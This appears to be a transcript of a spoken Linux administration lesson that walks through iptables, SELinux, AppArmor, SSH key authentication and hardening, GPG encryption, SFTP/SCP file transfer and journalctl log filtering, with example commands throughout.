The very first thing is to learn what your current rules are: `sudo iptables -L` (with a capital L) shows all of the current rules of your filter table. This is the other thing to know: a variety of tables exist inside iptables, and when you do not designate which table you want to look at, the default is the filter table, so the listing shows the INPUT, FORWARD, and OUTPUT chains of that table. To add a rule, use -A, a capital A for append, on the INPUT chain (notice that chain names are in all caps as well): `sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT` appends a rule to the INPUT chain for the TCP protocol with destination port 22, and the -j (jump) target is ACCEPT, so we are accepting incoming traffic arriving on destination port 22. To block traffic, you again append to the INPUT chain, the protocol is still TCP, the destination port in this case is 80, and you drop the traffic: `sudo iptables -A INPUT -p tcp --dport 80 -j DROP`. With iptables it is not "deny": where the previous rule said ACCEPT, a blocking rule says DROP.

To save the rules you just created, use the iptables-save command and send its output into the configuration file rules.v4, inside the /etc/iptables directory. Those are the rules that persist: when you restart the computer, everything you created is reloaded, so all of the rules are still active after each reboot. Notice the symbol used: saving redirects output with the greater-than sign (`>`) into rules.v4. Restoring is the reverse: iptables-restore uses the less-than sign (`<`) to read from the same rules.v4 path, restoring the rules from the saved file. That is handy if, for whatever reason, someone changed your rules, or you changed them yourself and want to go back to the previous rule set you saved: you pull all of those rules back out of your rules.v4 file with the restore command.
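A sketch of the iptables commands above. One practical wrinkle: with a bare `sudo iptables-save > file`, the redirection itself runs without root privileges, so wrapping the whole pipeline in `sh -c` is the usual workaround:

```bash
# List the current rules (the filter table by default)
sudo iptables -L

# Append to the INPUT chain: accept TCP traffic to destination port 22
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT

# Block incoming HTTP: drop TCP traffic to destination port 80
sudo iptables -A INPUT -p tcp --dport 80 -j DROP

# Persist the rules so they survive a reboot, then restore them later
sudo sh -c 'iptables-save > /etc/iptables/rules.v4'
sudo sh -c 'iptables-restore < /etc/iptables/rules.v4'
```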
In summary, we have simplified management with ufw, the uncomplicated firewall, and we have iptables for advanced, detailed control of network traffic, including the network address translation and the mangle table we covered in the first description of these tools. We needed to revisit firewall management because we are covering network security under the security chapter, and we will actually use both tools in the practical section of this training series, running plenty of commands and creating plenty of rules that will be relevant to your labs and, ultimately, to your skill set as a Linux administrator managing and configuring firewall rules with either ufw or iptables.

SELinux (Security-Enhanced Linux)

Another really important tool for security is SELinux, Security-Enhanced Linux. SELinux is a security module in the kernel that provides a mechanism for supporting mandatory access control (MAC) policies. It is commonly used in the Red Hat based distributions: Fedora, CentOS, and Red Hat Enterprise Linux. The key concept here is policies; we have policy-based security. The policies inside SELinux define the rules for which processes and users can access which resources, and these policies are strictly enforced, providing an additional layer of security beyond traditional discretionary access control (DAC).

There are three modes of operation:

• Enforcing: the SELinux policy is enforced and access violations are blocked.
• Permissive: the policies are not enforced, but violations are logged for auditing purposes.
• Disabled: SELinux is simply turned off and not working.

So you have enforcing, where anything that violates the policy is blocked; permissive, which still logs everything but blocks nothing, so malicious actions proceed yet every one of them is recorded for later auditing; and disabled. The very first basic command is for seeing what is going on: to view the status of SELinux, including which mode it is running under and which policy is loaded, you run `sestatus`. To change the mode at runtime you use the setenforce command, as sketched below.
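A minimal sketch of the status and mode commands:

```bash
# Show whether SELinux is enabled, its current mode, and the loaded policy
sestatus

# Switch to enforcing mode (1 = enforcing): violations are blocked
sudo setenforce 1

# Switch to permissive mode (0 = permissive): violations are only logged
sudo setenforce 0
```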
`sudo setenforce 1` changes the SELinux mode to enforcing and ensures that all SELinux policies are strictly enforced; the 1 effectively stands for true. `sudo setenforce 0` changes the mode to permissive, allowing violations to occur while logging them. So 1 activates enforcement of all rules, and 0 puts the system in permissive mode, where everything is logged but nothing is blocked or enforced. Together with checking the status, those are the practical examples for now: sestatus to see the mode, setenforce 1 for enforcing, setenforce 0 for permissive. We will go into the practical commands in depth when we reach the practical section of this training series, so that you can learn to use this tool properly.

AppArmor

Another useful tool is AppArmor, short for Application Armor. It is another MAC system (MAC as in mandatory access control, not the Apple kind) that provides an additional layer of security by confining programs according to a set of profiles. It is commonly used in Debian-based distributions such as Ubuntu and its derivatives, and it deals with applications specifically. The key concept here is profiles: where SELinux had policies, AppArmor has profiles, and the profiles define the access permissions for individual applications. They specify which files and capabilities an application can access, preventing it from performing unauthorized actions.

Think of the little popup that appears on Windows or macOS when you launch something: "Do you want to allow Google Chrome to access your microphone?" That permission is specific to the Chrome application, and by accepting you grant that one application access to your microphone. The same goes for your Downloads folder, your Documents, your pictures: when a downloaded program first touches the files on your system, the operating system asks whether that particular application may navigate there. AppArmor is similar: on an Ubuntu or Debian based distribution, the application itself must be given permission to perform its various tasks across your machine. AppArmor has two modes for a profile: enforce and complain.
In enforce mode, the AppArmor profile is enforced and unauthorized access attempts are blocked. In complain mode, unauthorized access attempts are allowed but logged for review. This mirrors the enforcing and permissive modes we saw inside SELinux; they are just named differently. Enforce applies the rules and blocks anything unauthorized; complain allows the attempt but records it.

The basic command to check the status is `sudo aa-status` (the aa stands for AppArmor). It displays the current status of AppArmor, including which profiles are loaded and their enforcement modes. To set a profile to enforcing mode, you run `sudo aa-enforce` followed by the path to the profile; it is a fairly lengthy path, but it points at the profile for the specific application whose rules are to be strictly applied. You will need the application's name as it appears among your binaries, and it is rarely what you see on screen: not "Google Chrome" with a capital G, a space, and a capital C, but typically all one word and all lowercase. Find the name of the application as it stands inside /usr/bin, /opt, or wherever it is actually installed, and use that in the profile path you enforce. To set a profile to complain mode instead, you run `sudo aa-complain` with the same path; the only thing that changes is aa-complain in place of aa-enforce. As practical examples: `sudo aa-status` to get the status of AppArmor, and `sudo aa-enforce /etc/apparmor.d/usr.bin.firefox` to enforce the profile for a specific application, in this case Firefox.
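A sketch of those AppArmor commands (the aa-* utilities ship with the apparmor-utils package on Ubuntu; the Firefox profile path follows the example above):

```bash
# Show loaded profiles and their current modes
sudo aa-status

# Enforce a profile: unauthorized access attempts are blocked
sudo aa-enforce /etc/apparmor.d/usr.bin.firefox

# Complain mode: attempts are allowed but logged for review
sudo aa-complain /etc/apparmor.d/usr.bin.firefox
```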
With that command, whatever the profile's rules are, they are now enforced upon Firefox. In summary, SELinux and AppArmor are both robust security mechanisms for Linux systems built on mandatory access control policies; that is what MAC stands for, alongside discretionary access control, DAC. While SELinux is typically used in Red Hat distributions and focuses on system-wide policies across the entire system, AppArmor is used in Debian-based distributions and emphasizes application-specific profiles. Both are very useful, and both deal in mandatory access control policies.

This is where MAC stops being abstract. When you go through CompTIA Security+, an examination I had the privilege of taking, they give you plenty of scenarios: here is mandatory access control, here is what it applies to, and so on. But you do not really get it until you work with tools that enforce those things. When I block Firefox from accessing my microphone, that is, technically, a mandatory access control policy mandating that this specific application cannot touch my microphone. If I later want Firefox to use the microphone for a voice call on, say, Discord or Microsoft Teams (Zoom being its own application), I need to go and grant it that permission, in AppArmor for example, if I am running Linux. That is where the rubber meets the road with these MAC concepts: the enforcement might be as simple as a popup asking whether an application may do something, or it might be you going into your settings or your terminal and applying the enforce profile in AppArmor against the Firefox tool itself. And that, in practice, is the difference between AppArmor and SELinux.

User Authentication and Secure Shell

Now we are going to switch gears a little and go into user authentication and configuring Secure Shell, which really do go hand in hand. First and foremost, user authentication methods. There is password-based authentication, the default mode for authenticating any given user: everybody gets a password, and you must enter yours correctly to prove you are who you say you are. Users are given a username and a password to gain access to a system or an application. This is not news; anything and everything in this world has a username and password. Take the YouTube you are watching this on: most likely you have a Google profile connected to your YouTube account, for which you provided your Gmail address and a password.
If you watch Netflix, you have a username and password. If you want to access your phone, there is a passphrase or a PIN you must enter, and when you unlock it with a face scan or a fingerprint, that is still authentication, just moving into biometrics (getting slightly ahead of ourselves). You authenticate yourself in a variety of ways, and the first and most basic is the password.

To improve the security of password-based authentication, you add something like multi-factor authentication, also known as MFA. That could be a one-time code sent to your phone or to your email account: they send you a secret code, you enter it, and you can access the system. The fingerprint scan is the biometric version of the same idea. These factors come in addition to the password. Say you access your bank account from a new computer or a new browser, or from the same machine after reformatting it or wiping your browsing history so your caches and cookies are gone. The site notices: "you are logging in from a new browser, we are sending you a one-time code." You enter your email and password, then the code, and then it asks whether to remember this browser for future logins, which is how new cookies get set. That is the whole process of multi-factor authentication. It enhances password authentication and is a very useful way to reduce the risk of unauthorized access: someone may get hold of your password, but most likely that person will not also control your phone number or your email. It is scary to think about, and it is possible for people to compromise your email or even your phone, but it is far harder than running a dictionary attack and finding a weak password.

The next level up is public key authentication, which is more secure than a password because it involves the use of a key pair: a private key and a public key. The private key remains with the user while the public key is placed on the server. This sits in the realm of symmetric and asymmetric encryption, the kind that typically protects transactions through your browser: a website holds a private key, vouched for by its certificate authority and never shown to you, and presents a public key to you, the viewer, so that both sides can verify each other and carry the interaction back and forth within that site.
Public key authentication supersedes, or amplifies, password-based authentication. It is no longer subject to brute-force attacks, because you cannot realistically brute-force a private/public key pair; it does not require transmitting passwords over the network, since only the keys are involved; and it allows automated, passwordless logins, which are particularly useful for scripts and applications. Note that it does include at least one initial login: an initial authentication with a password has to take place, but after that the process is automated, because the key pair now speaks for you to that server or application. It is similar in spirit to a browser that has stored your session: the next time you open Gmail or Facebook, even after closing the tab or the whole browser, you are let back in without retyping the password, because a stored credential is in place.

To generate a key, you use ssh-keygen. It is a somewhat involved process, so we will not go too deep here; we will when we reach the practical section of this training series. Running `ssh-keygen` generates a new key pair, and you will be prompted to enter a file in which to save the key, typically ~/.ssh/id_rsa, and then, optionally, a passphrase as an additional layer of security on the key itself: anyone who wants to use that key file must first enter the passphrase, so you now have multiple layers of security. You can also designate the key algorithm when generating (with the -t option), and the fingerprint ssh-keygen prints is hashed with SHA-256 by default, a very strong hashing algorithm.

The output is a series of individual prompts. First it says it is generating, then asks for the file to save the key to; you give a path or press Enter for the default. Then it asks for a passphrase; pressing Enter skips it, though I do recommend setting one for your key. You verify the passphrase, the key is saved, and the key fingerprint is displayed as a SHA256 value together with your username and host, followed by a long series of characters.
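A sketch of the generation step, with the prompts summarized as comments (`-t rsa` picks the RSA algorithm, matching the id_rsa example above):

```bash
# Generate a new key pair; -t selects the key algorithm
ssh-keygen -t rsa

# The tool then prompts, roughly:
#   Enter file in which to save the key (/home/user/.ssh/id_rsa):
#   Enter passphrase (empty for no passphrase):
#   Enter same passphrase again:
# and finally prints the key's SHA256 fingerprint and randomart.
```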
That trailing string looks like jargon, and for the most part it is: it reads like one long piece of encrypted code, and you cannot make sense of it with the naked eye. You would need to feed it into some other tool even to attempt to decode it, and for the most part you still cannot, because it is not designed to be decoded or decrypted without its key. Nobody can make sense of what was generated, or unlock the lock, unless they hold the key, which is why this concept is so powerful.

Now that we have generated the key, we want to copy it to the server: `ssh-copy-id user@server`. This copies the public key to the server, placing it inside the authorized_keys file of the .ssh directory for the specified user, and this step is what allows the server to authenticate the user based on the public key. If ssh-copy-id is not available, you can copy the public key manually by finding where it lives. Recall from the generation step that it was saved inside the user's home folder, under a hidden directory: a plain ls without the option for hidden files would not show it (we will look at hidden files in the practical section). Inside that hidden .ssh directory in the user's home folder sits the id_rsa key file.

The manual version is a series of commands chained together: `cat ~/.ssh/id_rsa.pub | ssh user@server "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"`. As you should already know, cat displays the contents of the public key file; the pipe takes that output and feeds it into the ssh command, which logs in to the server as that user; and the double ampersands combine commands, so on the server we first make the .ssh directory and then append the piped key onto the authorized_keys file. You do not need to memorize this or know what every piece represents right now; I am showing you the manual version so you get exposed to it, so that when we review it later it is already embedded somewhere in your head and easier to make sense of.
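Both ways of installing the key, side by side (`user@server` is the placeholder from the example; replace it with a real account and host):

```bash
# The easy way: copy the public key into the server's authorized_keys
ssh-copy-id user@server

# The manual equivalent when ssh-copy-id is unavailable:
# read the public key locally, create ~/.ssh remotely if needed,
# and append the key to authorized_keys
cat ~/.ssh/id_rsa.pub | ssh user@server "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"

# Afterwards, log in; with key auth in place there is no password prompt
ssh user@server
```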
When we go into the later portions of this, you will not need to know this off the top of your head, but you should recognize the key pieces: this is an SSH key file, an RSA key pair has been generated, and it looks like the public key is being added to the list of authorized keys for this particular user. As long as you can make sense of that, you do not need to know the exact details of everything that is going on; that is the main point I am trying to make here.

Once the key has been copied into authorized_keys, you can SSH into that server as that user with a very basic SSH command; you are just secure-shelling as that user into that particular server. Once you have set it up and copied the public key, you can log in without being prompted for a password; that is the whole idea. Again, this whole process requires some kind of authentication at some point: you cannot just add a key to the authorized_keys file without having been authenticated. This assumes you authenticated yourself with a password at some point before you started, so the system trusts you and allows you to transfer the key into authorized_keys; once you have done that, you can access the server without entering your password. If you have never entered your password and you try to access the server as that user, it is going to ask you for one. I do not care how well you have done the rest of the things we just talked about; if you never authenticated yourself, none of it will work, and at that point you will be asked for a password.

So the summary here: you have password-based authentication, which is the default mode of verifying who you are with almost any kind of system. Then you have multi-factor authentication, which enhances password-based authentication with something like a one-time code, your fingerprint, or a face scan. And then you have public key authentication, which is stronger security using a key pair; it still requires that at some point you entered a password to verify who you are, so that you could generate a key pair and transfer the public key from where it sits as your id_rsa into the server's authorized_keys. After that, you can reach the server without entering your password again. At some point you do need to provide a password, otherwise none of the rest works, so keep that in mind.
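As a quick sanity check, a sketch with user@server again as a placeholder; the second command refuses password authentication for just that one connection, so it only succeeds if the key is really doing the work:

```bash
# With the key installed, this should log you in with no password prompt:
ssh user@server

# Verify the key is actually being used; if the key was not installed
# correctly, this connection fails instead of falling back to a password.
ssh -o PasswordAuthentication=no user@server
```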
Okay, now that we have talked about authentication, we need to talk about Secure Shell and configuring Secure Shell. SSH is a very powerful tool for remote access, and in the modern era, in 2024 going into 2025, it is still one of the most powerful ways to access a Linux server specifically. It runs on port 22 by default, and for the most part the only thing required to access it is a password, unless you do other things to enhance the security, which is what we are going to talk about next. When you enhance the security of something, you are hardening it.

So we are going to harden our SSH configuration to mitigate potential threats, and these are some of the key steps. Number one, you want to change the default port. By default SSH runs on port 22, and simply changing the port can help reduce the risk of automated brute-force attacks that target that default port, because everybody and their mother, even a brand-new hacker, knows that port 22 is Secure Shell, the port for remote login, so that is what gets attacked first. The way to do that is to go into the sshd configuration file; you already know that sshd stands for the SSH daemon, and there is a configuration file for it. You will find the line that says Port 22, and it is typically commented out because it has not been modified, so you need to uncomment it, meaning remove the hash mark at the beginning, and then change it from 22 to 2222, for example. You can change it to almost anything else, but the first thousand or so ports are usually assigned to something, so you do not want to use any of those well-known ports; pick something higher, where it will no longer be a common port. Out of the roughly 65,000 ports available, once you set aside the low, commonly assigned ones, you can use practically any of the remaining 63,000 or so as the replacement for port 22, your new SSH port. Once you have made the change in nano, you save the file and close it, and you have reassigned your SSH port.

The next step is to disable root login. Not allowing the root user to log in via SSH is a very strong move, because if any hacker is allowed to log in as root, they get all the root permissions, and you can figure out what the rest of the problems will be after that. Disabling root login forces whoever it is, attacker or otherwise, to log in as a standard user account and then escalate privileges if they need anything more. Logging in as a standard user is already going to be a problem for them, especially if you enforce really strong password policies in your company, and once they are in as a standard user, they still have to find a way to escalate privileges and become an administrator or root to do the rest of what they want to do. So this is another really simple move that is very powerful: you just disable root login. The way to do it is, again, in the sshd configuration file, with the PermitRootLogin directive. You find the line that starts with PermitRootLogin; the default is prohibit-password, which actually still lets root log in with a key, just not with a password. You uncomment the line, remove the hash mark, and change it to PermitRootLogin no: nobody can log in as root, root login is not allowed at all. Then you save the file and exit the editor.
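In the file itself, those two changes look something like this; a sketch of /etc/ssh/sshd_config, the usual location on most distributions, with 2222 as just an example port:

```bash
# /etc/ssh/sshd_config
Port 2222            # was "#Port 22", uncommented and changed
PermitRootLogin no   # was "#PermitRootLogin prohibit-password"
```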
The next step is to limit the SSH users: you designate which users can actually log in via SSH, and nobody else can unless they are on that whitelist. This is another very powerful control that is very simple to set up, and it goes miles as far as security is concerned: you end up with a small handful of people who can log in through the SSH portal. This is again done in the sshd configuration file. You find the line that says AllowUsers, and if it is not there, you add it yourself. It is case sensitive, capital A, capital U: AllowUsers username1 username2, where those are the actual usernames that can log in via SSH. I would keep it to a small group of people; do not go crazy with this. You do not want a bunch of people able to log in over SSH; you just want the admins, the specific IT administrator, maybe the CEO or CTO, whoever those important people are, to have SSH access, and you close it off to everybody else. If other people want to access file systems remotely, you give them a separate, encrypted portal, a different login mechanism that runs across a VPN with its own authentication methods, so they can reach the file system and do what they need to do. They should not be coming in via port 22, or whichever port has been designated for SSH; that is the whole point here.

Once you have done all of those things, you need to restart the SSH service with a systemctl restart command. Restarting the service applies all the configuration changes you just made, so this part is very important: if you do not restart it, none of the rules you just added to the configuration file will be enforced.

In summary: you change the default SSH port by editing the configuration file, finding the Port 22 line, and changing it to your new port number. You disable root login in the same exact file by finding PermitRootLogin and changing it from the current setting to no; simply no, no root user is allowed to log in via SSH. You add the AllowUsers option so that only a limited number of users can log in via SSH. And once the whole thing is done and you have saved the configuration file, you restart the SSH service so that all the rules we just created are enforced. That is how you configure your SSH for secure access.
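Those last two steps as commands, a sketch with alice and bob as hypothetical usernames; note that on Debian-based systems the service unit may be named ssh rather than sshd:

```bash
# Append the whitelist to the config (or edit the file in nano instead).
# The directive is case sensitive: capital A, capital U.
echo 'AllowUsers alice bob' | sudo tee -a /etc/ssh/sshd_config

# Nothing takes effect until the daemon is restarted.
sudo systemctl restart sshd
```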
And now we need to talk about encryption and the secure transfer of files, which is another very important concept, starting with encrypting data with GPG. GPG is a tool for communicating securely, for securing communications and data transfer essentially. It uses asymmetric encryption, which involves a pair of keys, a public key and a private key, as we have already discussed in the key-generation portion. The public key is used to encrypt the data and the private key is used to decrypt the data: the public key locks it, the private key unlocks it. This ensures that only the intended recipient, who possesses the private key, can read the encrypted message. Only the person who has the private key is allowed to decrypt the message or file and get access to its contents. It is a very simple concept, but again a really powerful one.

To generate a key with GPG, you run gpg --gen-key, and it generates a new key pair. You will be prompted to provide a name, an email address, and an optional comment, and you can also set a passphrase for additional security, which I always recommend. Depending on the version, you may also get to select the key type and size; the default is usually fine, but if it gives you a range of options, I do recommend picking the largest key size available, because the bigger the key, the more powerful it becomes and the harder it is to break. You can set an expiration date for the key if you want, and you enter a passphrase if you want to protect the private key, which, again, I recommend you do. Those are the steps for generating your key with GPG.

This is what the output looks like. You run the gpg command, and it says it needs to construct a user ID to identify your key: the real name would be Alice, the email address would be this person, the comment would be this. It then shows you the user ID you selected and asks whether you want to change the name, email, or comment, or whether everything is okay; you confirm, press Enter, and it continues doing what it does. That user ID matters for the rest of what we are going to talk about, because it is the ID assigned to the key being generated, and when we get to encrypting a file, you have to give the recipient to the command. You run gpg --encrypt, where -r is the recipient; you put the ID of the recipient and then the file name you want encrypted, and it encrypts that file so that only that person's key can decrypt it. With an actual ID, it is the same command with bob@example as the recipient's ID and then the name of the file to be encrypted. Once it has been encrypted, the encrypted file will have a .gpg extension at the end: it still says document.txt, it will just say document.txt.gpg, indicating that it has now been encrypted.
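Those two steps as a sketch, with the bob@example.com address standing in for a real recipient ID:

```bash
# Generate a new key pair; you will be prompted for a name, an email
# address, an optional comment, and a passphrase.
gpg --gen-key
# (On newer GnuPG versions, gpg --full-generate-key additionally lets you
# choose the key type, size, and expiration date interactively.)

# Encrypt a file so only the named recipient's private key can decrypt it;
# the output lands next to the original as document.txt.gpg.
gpg --encrypt -r bob@example.com document.txt
```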
That is the file that will be sent to Bob, and Bob is the only person with the key that can decrypt it. Bob would then need to run the decrypt command: instead of -e, it is -d for decrypt, followed by the file name with the .gpg extension. For this to work, the key needs to have been added to his keyring, which we will do in a couple of slides, but essentially this is how the file gets decrypted: you run the command, you are prompted to enter the passphrase if there was one, and the file is decrypted. Very simple. The full command is just gpg -d document.txt.gpg, and it will output the decrypted content onto the console. Instead of that, you can output it into a text file, or any kind of file, by using the -o flag: you run exactly the same command, add -o and assign a name, for example decrypted_document.txt, then give it the .gpg file, and it will decrypt it and write the output into that file for later use.

To import a key, we use the import command: gpg --import followed by the public key file, and it imports the public key from that file into your GPG keyring. There you go, it is called a keyring, not a key log. So this is Bob's public key being imported into Bob's keyring when he runs this, and after that he can run the decrypt command. If you wanted to export a public key, you would run the export command with the -a option and the user ID, and redirect the output into a public key file. It exports the public key into a file; you replace the user ID with the email or key ID for the person, and the public key file is the name of the output file itself. That is the file that would later be imported into a keyring using the import command. In practice the export looks like this: you export this particular user's key into a key file, and that is the file you would email them, or, rather than email, it would probably be a secure-copy kind of situation; once they have it, they can import it into their keyring and then use it to decrypt a file. If you want to list the keys you have generated, you use the list-keys command, and it shows all the keys inside your GPG keyring, including the key IDs, the user IDs associated with them, and the key types.

So in summary, GPG is a very versatile tool for securing files and communications using public and private key pairs. With its commands for generating keys, encrypting and decrypting files, and managing keys, it ensures that your data remains confidential and secure, and as you saw, it is not a complicated tool to run. The process is fairly simple: you generate the key, and you encrypt the file with the ID of the person who should be able to decrypt it.
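And the receiving side of the workflow gathered into one sketch; the file names and the bob@example.com ID are illustrative:

```bash
# Decrypt to the console (you are prompted for the passphrase, if set):
gpg -d document.txt.gpg

# Decrypt into a file instead of printing to the console:
gpg -o decrypted_document.txt -d document.txt.gpg

# Export a public key to a file, and import one into your keyring:
gpg --export -a "bob@example.com" > bob_public.key
gpg --import bob_public.key

# List every key currently in your keyring:
gpg --list-keys
```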
Then you export that person's public key into a key file, you get them that key file, they import it into their keyring, and they can use it to decrypt whatever file they are supposed to decrypt. And typically, if you have added a passphrase to double up the security, they also need the passphrase. So if somebody intercepts that key file you generated and then emailed or secure-copied, but they do not have the passphrase that goes with it, they still cannot decrypt the original document, which provides an extra layer of security. I would also recommend sending the passphrase through a separate medium: you text them the passphrase and email them the key file, for example, so there are two different communications over two different channels. If somebody is intercepting their email, they will not get the passphrase you sent by text, or through WhatsApp, or some other method of communication. You could even call them and say, this is what it is, write it down, so there is no digital trail at all for that transfer of information. There are a lot of different ways to secure this, but I would highly recommend that every key file you generate, and every file that has been encrypted, also has a passphrase attached to it, so that decrypting requires the passphrase as well as the key.

And this is the perfect segue into secure file transfer, which we can do with SCP, secure copy, or SFTP, the secure file transfer protocol. These are essentially the ways you would transfer the key files you just generated, as well as the document that was encrypted: both the encrypted file and the generated key can be transferred using either SCP or SFTP.

SFTP is the interactive protocol for file transfer. It is the secure version of FTP, a very common protocol that was used for a very long time until people found out it is not secure, because most of its traffic is clear text, so the encrypted version, SFTP, was developed. It is more flexible and user friendly because it is interactive: once somebody has a login, they can navigate it very much the way they would navigate any Linux file system, and a lot of the same commands that run in a terminal against a file system also run inside SFTP once the person is logged in. You run sftp user@host and it initiates an SFTP session with the specified user on the remote host; then you can put a file onto that server, and somebody else can log in, access that file, and download it onto their computer. You can run the ls command to list the contents of a directory, or cd into the path of another directory, because you really are inside a file system; it is just one being managed remotely.
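Here is what a full session can look like, as a sketch with a placeholder user and IP; the get and put commands shown here are covered next:

```bash
# Start an interactive session (you will be prompted for alice's password):
sftp alice@192.168.1.50

# Inside the session:
sftp> ls                       # list the remote directory
sftp> cd reports               # change remote directory
sftp> put project.zip          # upload a local file
sftp> get document.txt.gpg     # download a remote file
sftp> get -r backups           # recursively download a whole directory
sftp> bye                      # end the session
```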
And you can download a file: you just say get with the file name, and you can put a file in as well. So, for example, the file we just encrypted with the commands we ran through, along with the key we just generated: we can take both of those and put them onto the server with put, and the person on the receiving side logs in, uses get, and downloads those files onto their local machine so they can decrypt them and get access. You can also do get -r with a remote directory to recursively download everything inside that directory onto your computer, instead of fetching an individual file with get, and you can do the same thing in the other direction with put -r and a local directory, recursively putting everything in that directory onto the server so the receiving side can grab it after logging in.

Here is what an example looks like, with the user alice on a particular IP address. You run sftp alice@ that address, and you will be prompted to enter the password for alice; it is not just going to immediately let you run ls, that is simply not how it works. Once you run the command, you enter the password, and if you have the right password, you are now inside that server as alice, and you can list the contents of the home directory, and so on. From there, say you want to transfer something to somebody else: you put project.zip onto the server, and now it exists inside that file hierarchy; then somebody else can log in, or alice can log in from a different computer onto this exact server, and get that exact file onto whatever machine they are on now. So you download a file with get and you upload one with put; it is very simple.

Secure copy, SCP, is the quick, straightforward file transfer over SSH; it is essentially the streamlined version of what we just did with the SFTP command. SFTP is logging into a file system; secure copy is just transferring a file from one host to another. This is what the SCP example looks like when transferring from your computer to the remote host: the command is scp, then the path to the file you want to transfer, then username@remote_host followed by the path where the file is going to land, and you can essentially designate wherever you want it to land. What happens as soon as you press Enter is very important: you are asked for the password of that user at that host. It is not going to transfer the file willy-nilly; you still need the password, and only then does it transfer the file to that location. It really is as simple as that: there is no logging into a file system, no running ls, no getting and putting and all those extra commands. You are simply doing a secure copy, much like a copy command you would run locally on your computer, except from your location to theirs.
This version goes the other way, from their computer to yours: essentially you just reverse the order of the command. You do scp, then username@remote_host followed by the path to that file, and then the destination path on your current computer. Again, as soon as you press Enter, you will be prompted for the password for that username at that remote host, so that you can copy the file from that location. What matters is which path is important in each direction. In the upload example, the remote destination is not that critical, because you can transfer the file essentially anywhere on their computer; you just need to tell them where you put it so they know where it is. The path of the local file is what matters there, because you need to know exactly where the file is and what file it is that you want to transfer out. In the download example, it is reversed: the remote path is very important, because you need to know exactly where the file is that you want to pull to your computer, and the local destination matters less, as long as you know where you just put the file.

So that is what secure copy is and how you transfer a file securely. It is, again, a very simple command, one command that does the job, instead of logging into a file system and doing all the rest of the stuff we did with SFTP: you are literally just doing a secure copy from one location to another, except it goes across the Secure Shell port, which is port 22 or whatever port you have assigned to SSH. It copies the file either from their location to yours or from yours to theirs, and that is basically what secure copy does: a very, very powerful tool for transferring files. You just need the password for the username on the host you want to pull the file from or send it to, and that is basically it for secure copy.
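Both directions as commands, a sketch with placeholder paths and host names, plus the custom-port case from the hardening section:

```bash
# Upload: your machine -> remote host (you are prompted for the password).
scp /path/to/local_file username@remote_host:/path/to/destination

# Download: remote host -> your machine, the same command reversed.
scp username@remote_host:/path/to/remote_file /path/to/local_destination

# If SSH listens on a non-default port (say the 2222 from earlier), add -P:
scp -P 2222 /path/to/local_file username@remote_host:/path/to/destination
```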
Okay, so now it is time to talk about troubleshooting and system maintenance, and the first part of this is log files: how to analyze and interpret them. The first command we are going to go over is journalctl, journal control, for system logs. journalctl is a very powerful command-line utility for viewing and managing the logs generated by the systemd journal, so this applies to the more modern versions of Linux that run systemd as their init process. It is particularly useful for system administrators and developers troubleshooting and maintaining system health on Linux systems that use systemd.

To view everything in the log, you just run journalctl and press Enter, and it displays all the logs recorded by the systemd journal, chronologically from the oldest entry to the newest, including system messages, kernel logs, and application logs. To filter by boot, if you just want to see logs from the current boot session, you run journalctl -b, which is particularly useful for diagnosing issues that occur during system startup. Then there is -b -1, which shows logs from the previous boot, and you can adjust the number to view logs from earlier boots: -2 goes one boot further back, -3 before that, and so on. So -b by itself is the current boot, -1 goes back to the previous boot, and you can keep going back to find all the boots that are still inside the log; at a certain point the journal will most likely have stopped recording them, so you can figure out how many it has in store and go as far back as the logs allow.

You can filter by service name using the -u option followed by the service name, and it displays all the logs related to that specific service. You might run one of the commands we went through previously, top for example, to see what services are running, and then look at the logs relevant to a specific one with journalctl -u and the name of the service; with SSH as the example, journalctl -u ssh displays all the logs relevant to the SSH service. If you want real-time log updates, you use journalctl -f, which is similar to running tail -f on a log file: tail shows the entries at the bottom of the log, the most recent ones appended to the file, and journalctl -f gives you real-time updates as entries are added and the log grows. You can combine it with any of the other log options to watch the most recent, real-time additions to a particular slice of the log, which is very useful for looking at live system activity or diagnosing issues as they occur.

Then you can filter by time: journalctl --since followed by a timestamp in the format you see on the screen, the year-month-day, hour-minute-second layout, and it shows all the entries from that time onward. When you provide an actual time, notice that in the example we did not give the minute and the second; we just said from 8:00 on November 15th, 2024, show me everything that has come through this log. You do not need to give it the minute and the second unless you are really trying to narrow down a specific incident, to get exactly the results you are looking for and provide further context for your investigation.
Usually, though, you can just say: from 8:00 a.m. on this particular day, show me everything that has happened since that time. If you want to filter by priority, you use the -p flag and give it a priority level, from level 0, which is emergency, down to level 7, which is debug. When you give journalctl a priority level, it shows every event at that level along with the more severe levels above it: -p err, for example, shows all the logs with the error priority and higher severity. You can also filter by unit and time together, going by the service name as well as the time; all of these options can be combined, this is not a matter of using one or the other. The example we got in this particular case is -u ssh together with --since November 20th, 2024 onward, and you can combine filtering by service and time, or a variety of other options: service and time and priority, for example, to filter the log files down to exactly the information you are looking for. So the full example looks like this: -u ssh --since November 15, 2024 at 8:00 a.m. shows you all of the log items for SSH since 8:00 a.m. on November 15, 2024.
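All of that as a compact cheat sheet, a sketch; keep in mind the SSH unit may be named sshd rather than ssh depending on the distribution:

```bash
journalctl                                   # everything, oldest to newest
journalctl -b                                # current boot only
journalctl -b -1                             # previous boot
journalctl -u ssh                            # one service's logs
journalctl -f                                # follow new entries live
journalctl --since "2024-11-15 08:00:00"     # entries from a point in time
journalctl -p err                            # "err" (level 3) and more severe
journalctl -u ssh --since "2024-11-15 08:00:00"   # filters combined
```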
So in summary, you can look at journalctl as a tool for system administrators on systemd-based Linux systems. It will not work with SysVinit, because it does not exist there, so journalctl only applies where systemd is the init system. From there, you have a lot of different options for viewing and filtering logs, and of course we are going to run a bunch of different formats of the journalctl command when we get into the practical portion of this training series, so you can get a good understanding of how to use it and all the filtering options available. Until then, this serves as your little cheat sheet: you can view the entire log, filter by boot, filter by service, follow real-time log updates, filter by time, and filter by priority, or combine all of these to create a very specific view of a particular series of incidents or log items. That is just a sample of the common journalctl commands for looking at system logs.

